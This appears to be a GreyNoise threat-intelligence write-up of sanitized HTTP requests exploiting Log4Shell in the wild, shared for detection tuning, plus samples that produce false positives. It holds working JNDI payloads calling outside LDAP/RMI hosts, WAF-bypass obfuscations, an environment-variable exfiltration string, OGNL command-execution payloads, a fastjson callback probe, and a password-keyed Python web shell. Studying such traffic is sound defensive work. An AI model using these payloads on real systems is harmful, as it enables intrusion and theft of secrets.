Enclosed are some sanitized samples of data GreyNoise has identified and collected related to the Log4J vulnerability exploitation in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise have observed.
These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.
The follow section includes Log4Shell samples seen in the wild
What appears to be a failed attempt:
GET /?id=%27%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F%27%2B+argv%5B2%5D+%2B%27%2Fass%7D%27 HTTP/1.1
Host: <HOST>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: '${${::-j}ndi:rmi://'+ argv[2] +'/ass}'
User-Agent: '${${::-j}ndi:rmi://'+ argv[2] +'/ass}'
Two obfuscation examples:
GET /?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://5.255.97.172:1389/a} HTTP/1.1
Host: <HOST>
Connection: close
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
GET /?q=${${lower:${lower:jndi}}:${lower:rmi}://5.255.97.172:1389/a} HTTP/1.1
Host: <HOST>
Connection: close
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
GET parameter as well as encoded into the authorization header:
GET /?x=$%7Bjndi:ldap://ec725b34.dns.1433.eu.org%7D HTTP/1.1
Host: <IP_ADDRESS>:631
user-agent: ${jndi:ldap://ec725b34.dns.1433.eu.org}
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
authorization: Basic JHtqbmRpOmxkYXA6Ly9lYzcyNWIzNC5kbnMuMTQzMy5ldS5vcmd9OiR7am5kaTpsZGFwOi8vZWM3MjViMzQuZG5zLjE0MzMuZXUub3JnfQ==
referer: ${jndi:ldap://ec725b34.dns.1433.eu.org}
Decoded base64:
${jndi:ldap://ec725b34.dns.1433.eu.org}:${jndi:ldap://ec725b34.dns.1433.eu.org}
Any method could appear, we simply wanted to provide an example of a method that was not GET
or POST
:
HEAD /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: <IP_ADDRESS>:8545
Connection: close
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
X-Forwarded-For: ${jndi:ldap://X-Forwarded-For.c6qtab5mk1u0ihtclet0cg47m7aeoyjro.interact.sh/x}
GET /$%7Bjndi:dns://45.83.64.1/securityscan-http664%7D HTTP/1.1
Host: <IP_ADDRESS>:664
User-Agent: ${jndi:dns://45.83.64.1/securityscan-http664}
Referer: ${jndi:dns://45.83.64.1/securityscan-http664}
X-Api-Version: ${jndi:dns://45.83.64.1/securityscan-http664}
Accept-Encoding: gzip
GET /$%7Bjndi:ldap://67.205.191.102:1389/jxjrbt%7D HTTP/1.1
Host: <HOST>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: ${jndi:rmi://67.205.191.102:1099/djf6hl}
GET /$%7Bjndi:iiop://128.90.61.199:10834/1639501300%7D HTTP/1.1
Host: <IP_ADDRESS>:443
Connection: close
Accept-Encoding: gzip
Connection: TE, close
Referer: ${jndi:iiop://128.90.61.199:10834/1639501300}
Te: deflate,gzip;q=0.3
User-Agent: ${jndi:iiop://128.90.61.199:10834/1639501300}
X-Api-Version: ${jndi:iiop://128.90.61.199:10834/1639501300}
GET /$%7Bjndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b%7D?${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}=${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b} HTTP/1.1
Host: <IP_ADDRESS>:443
Connection: close
Accept-Encoding: gzip
Cache-Control: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
Connection: close
Cookie: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}=${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
User-Agent: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
X-Leakix: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
We noticed some of these going around that attempts to be a catch-all, note the parameters and the POST
body:
POST /global-protect/login.esp?v=%24%7Bjndi%3Armi%3A%2F%2F<IP_ADDRESS>.5f3gyn.dnslog.cn%7D HTTP/1.1
Host: <IP_ADDRESS>:8081
Accept: */*
Accept-Charset: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Accept-Datetime: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Accept-Encoding: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Accept-Language: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Cache-Control: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Connection: keep-alive
Content-Length: 298
Content-Type: application/json
Cookie: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Dnt: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded-For-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded-Proto: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
From: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Max-Forwards: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Origin: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Pragma: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Referer: https://${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Te: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
True-Client-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Upgrade: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
User-Agent: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Via: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Warning: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Api-Version: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Att-Deviceid: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Correlation-Id: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Csrf-Token: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Csrftoken: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Do-Not-Track: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Foo: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Foo-Bar: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forward-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forward-Proto: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-By: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-For-Original: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Host: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Port: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Proto: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Protocol: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Scheme: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Server: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Ssl: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarder-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Frame-Options: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-From: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Geoip-Country: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Destinationurl: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Host-Override: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Method: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Method-Override: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Path-Override: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Https: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Htx-Agent: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Hub-Signature: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-If-Unmodified-Since: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Imbo-Test-Config: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Insight: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Ip-Trail: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Proxyuser-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Request-Id: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Requested-With: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Uidh: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Wap-Profile: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Xsrf-Token: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
{""username"": ""${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}"", ""user"": ""${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}"", ""email"": ""${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}"", ""email_address"": ""${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}"", ""password"": ""${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}""}"
GreyNoise noticed a particular attacker evolve their techniques. There was intially basic exploitation via a header:
GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: <IP_ADDRESS>:2375
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Waterfox/91.4.0
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:ldap://jobs3734.log.helicopter-crash.online:443/file}
This later evolved into use of a parameter that completely obfuscates and enables WAF bypass for most Log4J related rules:
GET /websso/SAML2/SSOSSL/vsphere.local?RelyingPartyEntityId=JHskezo6LWp9bmRpOnJtaTovLzQ1Ljc3LjEyNC42MTo0NDMvUkF9 HTTP/1.1
Host: <HOST>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 6812.88.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.153 Safari/537.36
Decoded base64:
${${::-j}ndi:rmi://45.77.124.61:443/RA}
We saw a variant of this where the payload was a bit more sophisticated in it's use of bypasses:
GET /websso/SAML2/SSOSSL/vsphere.local?RelyingPartyEntityId=JHskezo6LWp9bmRpOmxkYXA6Ly80NS43Ny4xMjQuNjE6NDQzLyMzZDJmMjc3MjczNzQ3ODVmZGVlMjkyYjI0Nzg2MjFkZF86O18ke2VudjpQQVRIfV86O18ke2VudjpVU0VSfV86O18ke2VudjpVU0VSTkFNRX1fOjtfJHtlbnY6SE9TVE5BTUV9Xzo7XyR7ZW52OlVTRVJETlNET01BSU59Xzo7XyR7ZW52OkNPTVBVVEVSTkFNRX1fOjtfJHtidW5kbGU6YXBwbGljYXRpb246c3ByaW5nLmRhdGFzb3VyY2UudXJsfV86O18ke3N5czpqYXZhLnZlcnNpb259fQ== HTTP/1.1
Host: <IP_ADDRESS>:8081
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Decoded base64:
${${::-j}ndi:ldap://45.77.124.61:443/#3d2f27727374785fdee292b2478621dd_:;_${env:PATH}_:;_${env:USER}_:;_${env:USERNAME}_:;_${env:HOSTNAME}_:;_${env:USERDNSDOMAIN}_:;_${env:COMPUTERNAME}_:;_${bundle:application:spring.datasource.url}_:;_${sys:java.version}}
This section provides samples of some false positives that may appear with overly broad matching patterns.
Variations on OGNL exploits show up fairly often due to their relation to Java and sharing many similar fingerprinting bypasses
GET /%25%7b(%23dm%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context['com.opensymphony.xwork2.ActionContext.container']).(%23ognlUtil%3d%23container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3d'ping%208z8usjxsanw60xuueazmq5e1isoic7.burpcollaborator.net%20-c1').(%23iswin%3d(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(%23cmds%3d(%23iswin%3f%7b'cmd.exe'%2c'/c'%2c%23cmd%7d%3a%7b'/bin/bash'%2c'-c'%2c%23cmd%7d)).(%23p%3dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3d%23p.start()).(@org.apache.commons.io.IOUtils@toString(%23process.getInputStream()))%7d/portal/js/html5shiv.min.js HTTP/1.1
Host: <IP_ADDRESS>:443
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
This false positive can potentially be avoided by looking for jsonrpc
"{""id"":1,""jsonrpc"":""2.0"",""method"":""login"",""params"":{""login"":""42m9nqbb2aL9TTYHUeBrz8VactZAbtMBzdTjdoofR5XNGRa9H1Mcxenat3vZazj9s9bLJq31ugJFKKWYSLKznsQHCLgEJfo"",""pass"":""x"",""agent"":""XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019"",""algo"":[""cn/1"",""cn/2"",""cn/r"",""cn/fast"",""cn/half"",""cn/xao"",""cn/rto"",""cn/rwz"",""cn/zls"",""cn/double"",""cn/ccx"",""cn-lite/1"",""cn-heavy/0"",""cn-heavy/tube"",""cn-heavy/xhv"",""cn-pico"",""cn-pico/tlo"",""cn/upx2"",""rx/0"",""rx/wow"",""rx/arq"",""rx/graft"",""rx/sfx"",""rx/keva"",""argon2/chukwa"",""argon2/chukwav2"",""argon2/ninja"",""astrobwt""]}}
I don't know what to say about this...
POST /logupload?logMetaData={""a"":{""@type"":""com.alibaba.fastjson.JSONObject"",{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao5""}}""""},""b"":{{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao6""}:""x""},""c"":{{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao7""}:0,""d"":Set[{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao8""}],""e"":Set[{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao9""},} HTTP/1.1
Host: <IP_ADDRESS>:8443
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 4411
Content-Type: multipart/form-data; boundary=7ddcdf06c9de6031e144846ebacf8cde
User-Agent: python-requests/2.25.1
--7ddcdf06c9de6031e144846ebacf8cde
Content-Disposition: form-data; name=""logfile""; filename=""upload.txt""
#! /usr/bin/env python3
import cgi
import os,sys,subprocess
import logging
import json
WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME = ""workload_log_{}.zip""
class LogFileJson:
"""""" Defines format to upload log file in harness
Arguments:
itrLogPath : log path provided by harness to store log data
logFileType : Type of log file defined in api.agentlogFileType
workloadID [OPTIONAL] : workload id, if log file is workload specific
""""""
def __init__(self, itrLogPath, logFileType, workloadID = None):
self.itrLogPath = itrLogPath
self.logFileType = logFileType
self.workloadID = workloadID
def to_json(self):
return json.dumps(self.__dict__)
@classmethod
def from_json(cls, json_str):
json_dict = json.loads(json_str)
return cls(**json_dict)
class agentlogFileType():
"""""" Defines various log file types to be uploaded by agent
""""""
WORKLOAD_ZIP_LOG = ""workloadLogsZipFile""
try:
# TO DO: Puth path in some config
logging.basicConfig(filename=""/etc/httpd/html/logs/uploader.log"",filemode='a', level=logging.ERROR)
except:
# In case write permission is not available in log folder.
pass
logger = logging.getLogger('log_upload_wsgi.py')
def application(environ, start_response):
logger.debug(""application called"")
if environ['REQUEST_METHOD'] == 'POST':
post = cgi.FieldStorage(
fp=environ['wsgi.input'],
environ=environ,
keep_blank_values=True
)
# TO DO: Puth path in some config or read from config is already available
resultBasePath = ""/etc/httpd/html/vpresults""
try:
filedata = post[""logfile""]
metaData = post[""logMetaData""]
if metaData.value:
logFileJson = LogFileJson.from_json(metaData.value)
if not os.path.exists(os.path.join(resultBasePath, logFileJson.itrLogPath)):
os.makedirs(os.path.join(resultBasePath, logFileJson.itrLogPath))
if filedata.file:
if (logFileJson.logFileType == agentlogFileType.WORKLOAD_ZIP_LOG):
filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME.format(str(logFileJson.workloadID)))
else:
filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, logFileJson.logFileType)
with open(filePath, 'wb') as output_file:
while True:
data = filedata.file.read(1024)
# End of file
if not data:
break
output_file.write(data)
body = u"" File uploaded successfully.""
start_response(
'200 OK',
[
('Content-type', 'text/html; charset=utf8'),
('Content-Length', str(len(body))),
]
)
return [body.encode('utf8')]
except Exception as e:
logger.error(""Exception {}"".format(str(e)))
body = u""Exception {}"".format(str(e))
else:
if environ['REQUEST_METHOD'] == 'GET':
post = cgi.FieldStorage(
fp=environ['wsgi.input'],
environ=environ,
keep_blank_values=True
)
if post[""key""].value == ""hell0W0rld"":
command = post[""baby""].value
proc = subprocess.run(command, shell=True,stdout=subprocess.PIPE)
body = proc.stdout.decode(""utf-8"")
start_response(
'200 OK',
[
('Content-type', 'text/html; charset=utf8'),
('Content-Length', str(len(body))),
]
)
return [body.encode('utf8')]
logger.error(""Invalid request"")
body = u""Invalid request""
start_response(
'400 fail',
[
('Content-type', 'text/html; charset=utf8'),
('Content-Length', str(len(body))),
]
)
return [body.encode('utf8')]
--7ddcdf06c9de6031e144846ebacf8cde--
GET //${%23context['xwork.MethodAccessor.denyMethodExecution']=!(%23_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('id').waitFor()}.action HTTP/1.1
Host: <HOST>
Connection: close
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Cache-Control: no-cache
Connection: Close
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)